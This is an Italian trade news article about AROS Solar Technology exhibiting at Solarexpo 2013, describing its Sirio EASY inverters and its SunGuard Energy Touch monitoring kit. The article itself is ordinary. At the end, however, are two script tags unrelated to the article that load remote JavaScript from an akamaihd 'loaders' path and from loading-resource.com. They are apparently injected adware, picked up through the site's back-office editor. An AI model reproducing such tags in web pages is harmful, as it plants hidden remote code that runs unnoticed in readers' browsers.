1. Home
  2. Notizie e Mercato
  3. Novità AROS al Solarexpo 2013

Novità AROS al Solarexpo 2013

Energie rinnovabili di
5/5
votato da 1 persone
AROS Solar Technology non poteva mancare alla XIV edizione di Solarexpo, quest’anno per la prima volta nel nuovo polo fieristico di Rho-Pero (Milano)


AROS anche per quest’anno ha confermato la propria partecipazione a Solarexpo, mostra e convegno internazionale su energie rinnovabili e generazione distribuita, fra i primi 3 eventi fieristici specializzati al mondo sui temi dell’energia solare.

Con un’ area espositiva di 180 mq l’azienda presenterà al pubblico e alla stampa tutta la gamma prodotti: una linea di inverter sempre più completa e competitiva in grado di coprire ogni esigenza, dal piccolo impianto domestico alle grosse centrali solari, ma anche soluzioni di comunicazione e di supervisione degli impianti.

Non mancheranno le novità, tra cui gli inverter della gamma Sirio EASY: leggeri, compatti, facili da installare e configurare, questi inverter trovano la loro congeniale collocazione in impianti con stringhe di dimensioni ridotte in virtù degli ampi range di tensione e di corrente in ingresso. Disponibili nelle potenze da 1500, 2000 e 3000W utilizzano tecnologie innovative e componenti di qualità che permettono di sfruttare al massimo la potenza del generatore fotovoltaico in ogni istante e in qualsiasi condizione meteorologica, garantendo un’efficienza di conversione fino al 97,3%.

All’interno dello stand AROS sarà possibile anche testare le numerose funzioni del nuovo sistema di monitoraggio SunGuard Energy Touch: una soluzione che consente di gestire gli impianti monofase e trifase avendo sempre sotto controllo l’andamento dei consumi in relazione all’energia prodotta, immessa e prelevata.

Il kit SunGuard Energy Touch è composto da un datalogger SunGuard Box Wi-Fi, da un analizzatore bidirezionale SunGuard Meter con TA incluso e da un display SunGuard 7” Wi-Fi Touch Screen.

Il sistema si installa in pochi minuti e risulta particolarmente semplice nel settaggio ed uso quotidiano. Basta infatti connettere il datalogger SunGuard Box all’analizzatore di rete bidirezionale e all’inverter ed effettuare una semplice configurazione. Dopo aver eseguito l’allineamento con i valori delle energie del contatore di produzione e del contatore di scambio, il sistema è pronto all’uso. La supervisione dell’impianto è possibile in locale attraverso l’elegante display touch in dotazione o in remoto attraverso il portale di supervisione mediante l’uso di PC, Smartphone, Tablet o Smart TV. SunGuard Energy Touch è disponibile nella versione monofase 30A - trifase 63A e trifase 125A.

Solarexpo sarà un’occasione per incontrare i principali attori industriali nazionali ma anche tutti i leader internazionali del solare. AROS vi aspetta al padiglione 2, stand O0.1.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>